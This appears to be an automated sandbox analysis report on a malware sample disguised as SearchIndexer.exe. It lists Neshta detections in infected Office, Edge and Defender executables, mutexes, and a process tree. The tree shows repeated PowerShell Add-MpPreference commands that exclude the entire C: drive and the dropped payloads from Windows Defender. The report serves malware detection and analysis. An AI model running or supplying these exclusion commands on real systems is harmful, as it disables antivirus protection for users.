Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta
Source: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe, type: DROPPED	Matched rule: MALWARE_Win_Neshta author = ditekSHen, description = Detects Neshta

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@102/312@1/2

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe

File created: C:\Program Files (x86)\windows multimedia platform\tAVtSoJGTaCxrZiXcJn.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe

File created: C:\Users\user\Desktop\aViTseNl.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\svchost.com	Mutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush. svchost.com n X . t N t h ` T 5 @
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_03
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-QVgodjXaIbAcRVoIzEKD

Source: C:\Users\user\Desktop\SearchIndexer.exe

File created: C:\Users\user\AppData\Local\Temp\3582-490

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3vTESgZFSf.bat"

Source: SearchIndexer.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.29%

Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SearchIndexer.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SearchIndexer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: integrator.exe.0.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: integrator.exe.0.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: integrator.exe.0.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: integrator.exe.0.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

Source: SearchIndexer.exe	Virustotal: Detection: 88%
Source: SearchIndexer.exe	ReversingLabs: Detection: 100%

Source: C:\Users\user\Desktop\SearchIndexer.exe

File read: C:\Users\user\Desktop\SearchIndexer.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SearchIndexer.exe "C:\Users\user\Desktop\SearchIndexer.exe"
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process created: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe"
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5B1.tmp" "c:\Windows\System32\CSC8B0546412F3A4425A5D7AA169F4D63A4.TMP"
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\SearchIndexer.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows multimedia platform\tAVtSoJGTaCxrZiXcJn.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3vTESgZFSf.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE"
Source: C:\Windows\svchost.com	Process created: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe "C:\Program Files (x86)\windows nt\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe"
Source: unknown	Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE"
Source: C:\Windows\svchost.com	Process created: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE"
Source: C:\Windows\svchost.com	Process created: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE"
Source: C:\Windows\svchost.com	Process created: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE
Source: unknown	Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE"
Source: C:\Windows\svchost.com	Process created: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE
Source: unknown	Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE"
Source: C:\Windows\svchost.com	Process created: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE
Source: unknown	Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE"
Source: C:\Windows\svchost.com	Process created: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE
Source: unknown	Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE"
Source: C:\Windows\svchost.com	Process created: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE
Source: unknown	Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE"
Source: C:\Windows\svchost.com	Process created: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE
Source: unknown	Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\Provisioning\Packages\TAVTSO~1.EXE"
Source: C:\Windows\svchost.com	Process created: C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe C:\Windows\Provisioning\Packages\TAVTSO~1.EXE
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process created: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\SearchIndexer.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows multimedia platform\tAVtSoJGTaCxrZiXcJn.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3vTESgZFSf.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5B1.tmp" "c:\Windows\System32\CSC8B0546412F3A4425A5D7AA169F4D63A4.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe "C:\Program Files (x86)\windows nt\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe"
Source: C:\Windows\svchost.com	Process created: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE
Source: C:\Windows\svchost.com	Process created: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE
Source: C:\Windows\svchost.com	Process created: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE
Source: C:\Windows\svchost.com	Process created: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE
Source: C:\Windows\svchost.com	Process created: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE
Source: C:\Windows\svchost.com	Process created: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE
Source: C:\Windows\svchost.com	Process created: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE
Source: C:\Windows\svchost.com	Process created: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE
Source: C:\Windows\svchost.com	Process created: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE

Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
